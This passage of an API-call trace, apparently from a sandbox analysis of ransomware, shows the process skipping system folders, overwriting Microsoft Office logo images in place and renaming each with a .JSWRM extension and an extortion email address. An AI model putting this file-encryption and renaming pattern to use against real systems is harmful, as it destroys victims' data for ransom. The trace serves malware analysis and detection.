lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.158] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3353) returned 1 [0133.158] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.158] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd10, lpOverlapped=0x0) returned 1 [0133.160] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.160] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd10, lpOverlapped=0x0) returned 1 [0133.160] CloseHandle (hObject=0x238) returned 1 [0133.160] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.161] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a68b471, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7a3, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.contrast-black_scale-80.png", cAlternateFileName="MSPUBL~1.PNG")) returned 1 [0133.161] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.161] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.161] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.161] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.161] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0133.161] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0133.161] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.161] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.161] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0133.161] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0133.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0133.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0133.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0133.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0133.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.162] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1955) returned 1 [0133.162] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.162] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7a0, lpOverlapped=0x0) returned 1 [0133.164] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.164] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7a0, lpOverlapped=0x0) returned 1 [0133.164] CloseHandle (hObject=0x238) returned 1 [0133.164] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.165] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x88a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.contrast-white_scale-100.png", cAlternateFileName="MSF61D~1.PNG")) returned 1 [0133.165] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.165] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.165] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.165] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.165] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0133.165] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0133.165] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.165] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.165] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0133.165] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0133.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0133.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x22d298, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0133.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.166] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2186) returned 1 [0133.166] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.166] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x880, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x880, lpOverlapped=0x0) returned 1 [0133.168] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.168] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x880, lpOverlapped=0x0) returned 1 [0133.168] CloseHandle (hObject=0x238) returned 1 [0133.169] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.170] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae4, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.contrast-white_scale-140.png", cAlternateFileName="MS39EB~1.PNG")) returned 1 [0133.170] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.170] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.170] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.170] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.170] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0133.170] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0133.170] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.170] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.170] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0133.170] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0133.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0133.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0133.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.171] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2788) returned 1 [0133.171] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.171] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xae0, lpOverlapped=0x0) returned 1 [0133.173] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.173] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xae0, lpOverlapped=0x0) returned 1 [0133.173] CloseHandle (hObject=0x238) returned 1 [0133.173] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.174] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd1e, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.contrast-white_scale-180.png", cAlternateFileName="MSEB57~1.PNG")) returned 1 [0133.174] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.174] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.174] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.174] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.174] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0133.174] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0133.174] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.174] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.174] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0133.174] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0133.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0133.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0133.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.175] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3358) returned 1 [0133.175] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.175] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd10, lpOverlapped=0x0) returned 1 [0133.177] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.177] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd10, lpOverlapped=0x0) returned 1 [0133.177] CloseHandle (hObject=0x238) returned 1 [0133.177] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.178] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7b7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.contrast-white_scale-80.png", cAlternateFileName="MS7453~1.PNG")) returned 1 [0133.178] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.178] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.178] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.178] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.178] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0133.178] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0133.178] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.178] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.179] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0133.179] lstrcmpiW (lpString1="MsPubLogo.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0133.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0133.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0133.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0133.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-white_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, 